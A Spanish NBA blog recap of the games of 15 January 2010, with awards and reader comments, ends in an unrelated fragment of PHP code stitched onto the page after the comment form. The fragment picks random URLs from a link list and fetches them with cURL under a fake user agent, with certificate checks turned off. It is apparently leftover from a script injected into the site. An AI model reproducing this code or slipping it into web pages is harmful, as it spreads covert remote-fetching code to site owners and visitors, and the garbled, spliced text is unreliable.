La Crónica (15/01/2010)

16 de January de 2010 por Viva_Dirk

Viernes noche quiere decir festín de partidos para nuestros ojos y hoy vamos a repasar lo que dio de sí la noche en orden cronológico.

Los Bobcats dejaron a los Spurs en 76 puntos y definitivamente huelen a hueso para los gigantes del Este porque cuando Larry Brown junta un grupo de guerrilleros como éstos, que no andan faltos de talento, sabes que vas a sudar sangre para ganarlos.

Volvió Kevin Martin a los Kings y automáticamente bajó el rendimiento de Tyreke&Udrih, así que todo indica que si en Sacramento quieren definitivamente cambiar de rumbo, es Kevin el que debe cambiar de aires. Los que sacaron tajada fueron los Sixers con un gran Dalembert.

Vimos dos prórrogas en Chicago para que finalmente los locales se llevasen la victoria frente a los Wizards con actuaciones estelares de Rose y Jamison mientras Noah y Haywood se pegaban bajos los aros. Por su parte los Pacers ganaron a los Nets cómodamente, y es que en el descanso ya vencían de 20.

En uno de los duelos más interesantes de la noche los Hawks ganaron por la mínima a Phoenix. En Atlanta el único que sigue decepcionando es Marvin Williams mientras Grant Hill sigue dando lecciones de vez en cuando. En la sorpresa de la noche los Pistons ganaron a unos enrachados Hornets de la mano de dos ‘veteranos de guerra’ del Palace como Rip Hamilton y Ben Wallace. Toronto gano a los Knicks sin necesidad de un gran Bosh porque el resto sí jugaron muy bien, incluído nuestro Calderón.

Paliza de Memphis a los Wolves y los ositos que se encuentran en una gran dinámica, algo importante para un grupo tan joven. Zach llamando con insistencia a las puertas del All-Star, Marc haciendo partidos casi perfectos y el resto a un grandísimo nivel. Cuidado al que le toque jugar contra ellos ahora. Otro de los gallos del Oeste, los Mavs, ganaron a los Thunder en un duelo casi generacional. Nowitzki y Terry pusieron la pólvora y Kidd hizo ‘albañilería y fontanería’.

Miami ganó a Houston con actuaciones prometedoras de los compañeros de Wade mientras a los Rockets el Oeste empieza a hacérsele demasiado duro. ¡Cuánto darían por estar donde los Heat!

En Los Angeles regresó Pau y los Lakers machacaron sin piedad a los Clippers que andan de capa caída tras la noticia de Griffin y la baja de Kaman. Partido perfecto para el vecino rico donde Bynum no notó para mal la vuelta del español.

Después de un tiempo vimos otro muy buen partido de Jennings que sirvió para que los Bucks ganasen a los Warriors, que recibieron la buena noticia de la vuelta de Andris Biedrins. Y en el último partido de la noche, los Magic confirmaron que se encuentran en un estado de forma pésimo y perdieron con claridad ante Portland, y eso que los de Oregón no contaban con Brandon Roy.

PREMIOS TJNBA:

MVP: Muchas actuaciones que destacar. Diaw, Murphy, Bargnani y Zach lideraron a sus equipos con dobles-dobles de más de 20 puntos. Wade y Rose tuvieron que anotar más de 30 puntos y dar más de 5 asistencias. Pero nos quedamos con la pareja de viejos rockeros de la Motown. Hamilton y Wallace sumaron 45 puntos, 24 rebotes y 15 asistencias para sacar a su equipo del fango.

Rookie: Son Jennings y Blair los que se disputan hoy el premio. Jennings anotó 25 puntos y dio 7 asistencias a la vez que perdía 7 balones, errores de novato. Y Blair sigue diciéndole a Popovich que quiere la titularidad definitiva con 11 puntos y 16 rebotes.

La sorpresa: Seguro que encontramos muchas, pero volviendo de una larga lesión, Andris Biedrins consiguió 10 puntos, 10 rebotes, 3 tapones y un 5 de 7 en tiro. Los hay que se tiran un mes para volver a su anterior nivel pero para otros es como si el tiempo no hubiese pasado.

La decepción: Vince Carter volvió a jugar y sólo si no estaba para ello nos explicamos sus 5 puntos con un 1 de 7 en tiros en 21 minutos. Tampoco tiene desperdicio la actuación de Emeka Okafor, que rejuveneció unos cuantos años a Ben Wallace.

El mayor esfuerzo en vano: Antawn Jamison está dando un curso de profesionalidad en la capital. Anoche volvió a ser el mejor de su equipo, esta vez con una monstruosa actuación de 34 puntos, 18 rebotes y 5 asistencias.

Comenta

6 comentarios a esta entrada

  1. Noelinho dice:
    #1

    Ayer vi el Spurs – Bobcats y como secaron los de Larry Brown a los Spurs. También hay que decir que a estos últimos se les ven muy poquitas ideas. Parker no está bien (el pie era?), Duncan no tuvo su noche ayer y Ginobili sólo da destellos de lo que fue. Muy grande Blair, en el primer cuarto ya había capturado 7 rebotes, y parece fácil!!

    Por otro lado ayer se vivió algo muy raro con los Warriors, y es que Curry acabó jugando a pesar de tener 6 faltas personales. Se ve que hay una regla por ahí escondida que dice que por problema de lesiones (Hunter ayer) no se puede quedar un equipo con menos de 5 en la cancha. Curioso.

      Citar

  2. Love Denise dice:
    #2

    Otis, echa a VanGundy de una vez

      Citar

  3. Txusma dice:
    #3

    Pues un rumor que suena es un Kevin Martin x Jose Calderon. No me pareceria ni mucho menos el peor destino para el español, eso si, en Toronto no va a defender ni el pepe.

      Citar

  4. sergio dice:
    #4

    Pues como en Phoenix, Ny o los Warriors… y solo uno de ellos no esta en Playoffs. Eso si, sin defensa esa es la maxima meta del equipo.

    Muy bien lo de Biedrins. A mi me parece un jugador con un gran futuro (es muuuy joven) y con cabeza y trabajo para conseguirlo.

    Ayer vi a los Grizzlies y me gusta comprobar que empiezan a tener detalles de equipo unido en el que se conocen todos. Cada uno parece aportar lo suyo sin estridencias ni individualismos. Ciertos mecanismos les estan dando muchos frutos…

      Citar

  5. Viva_Dirk dice:
    #5

    Para mi seria un destino perfecto para Calde, donde puede ejercer de veterano y dirigir a un grupo de jóvenes lleno de talento.

      Citar

  6. Toni dice:
    #6

    Buen trio de bases, Calde (direccion), Udrih (más anotador) y Sergio en caso de emergencia para buscar un posible revulsivo (plasticidad). Pero creo que si Calderon cayera en la dejadez Udrih no tardaría en jugar más minutos que él ya que está realizando una buena temporada.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>